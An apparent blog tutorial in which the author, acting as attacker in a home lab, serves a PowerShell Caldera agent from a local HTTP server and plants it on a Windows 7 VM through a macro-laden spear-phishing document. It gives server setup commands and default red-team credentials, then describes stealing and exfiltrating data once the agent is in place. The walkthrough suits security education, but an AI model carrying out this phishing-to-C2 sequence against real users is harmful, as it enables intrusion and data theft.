How a Hacker can get access to your computer
Hello There,
Here I am again and today I am going to show you how an attacker can infect your computer with an agent , that communicates back to to him and allows him to get full access to your system.
For demonstration I am going to use a Caldera server and a spear phishing document with a macro code.
*As an Attacker -I will operate my mane Linux Mint OS , with Caldera server installed ,also need a local server app to provide HTTP path to the malicious Powershell script file (malware.ps1)
*As a victim — I will operate Windows 7 virtual machine
What is Caldera Server ? You can check it out here :
Lets imagine you received an email with attached document, and you clicked on enable macro to see some contents in that document. This macro code infected your system without you noticed anything. How is that possible?
In my previous post I have explained how to create a document with hidden malicious code embedded in it.
https://medium.com/@salim.y.salimov/malicious-attack-with-macro-c
Now let see what is the next step the attacker takes and how does he doing it.
Here is the illustration of this scenario:
Lets begin and see step by step how its done.
- On my attacker System I start few things as a preparation
- Use Ctrl+Alt+T to open the terminal
get your local ip address with this command:
ifconfig
- we will need local HTTP server with this command :
python3 -m http.server — bind 192.168.1.116 9000
(replace with your own IP)
- open another terminal window and start Caldera server running with this command:
cd ~/caldera && python3 server.py
- Open Caldera WEB INTERFACE through web browser
- login as red team with user : RED and password : admin
or if you have changed it use your password, if you don’t know it at all open another terminal and run this command :
cd ~/caldera/conf && gedit local.yml
scroll down to the bottom in the text editor and the password should be there just copy it and paste.
( for my convenience I have created desktop launchers that execute this commands )
once logged in you can minimize the two terminals that running servers but do not close them.
2. Prepare an agent In Caldera web interface
-go to agents and click on configurations change few things like the name of the agent file that is going to be implanted in victims machine I am going to leave as default now
-click on deploy an agent an chose one of the available options in drop down menu as well as the OS of the wictim, I choose Sandcat with HTTP then to be Windows version
-on next screen use your Caldera Server’s Ip in my case is my main Operating System’s localhost IP again
-copy the first generated code under neat, create a new empty simple text document for example on the desktop , open it and paste the caldera code inside , save and close, then lets rename it to malware with extension .ps1
3. Now we are ready to implant an agent to our victim’s machine which will be my virtual WINDOWS 7 machine — Lets test if it works.
4. Testing
- start up the VM
- check the separate http server we created earlier on port 9000( http://192.168.1.116:9000/ )if its accessible with browser
- check the micro code in the spear phishing document and edit it to match the file name and location — should point to the malware .ps1 that we created on our desktop and should reach it via or http server
-copy this document to VM (we call it has been send by email)
and wait for victim to open it .
-Keep eye on the caldera web interface on agents tab
-on virtual machine open the document as victim would do
- And HERE WE GO, the agent is implanted and attacker has the command and control server working for him.
- from now on he can send different commands choosing auto generated or manual through caldera server to manipulate , steal ,exfiltrate information and data.
Of course in reality this would not be that easy , as this attack would be detected by antivirus software or Windows Defender , unless attacker uses different tactics and technics to avoid detection .
Hope you have enjoyed this article, Thanks for reading, and I will see you in the next one.
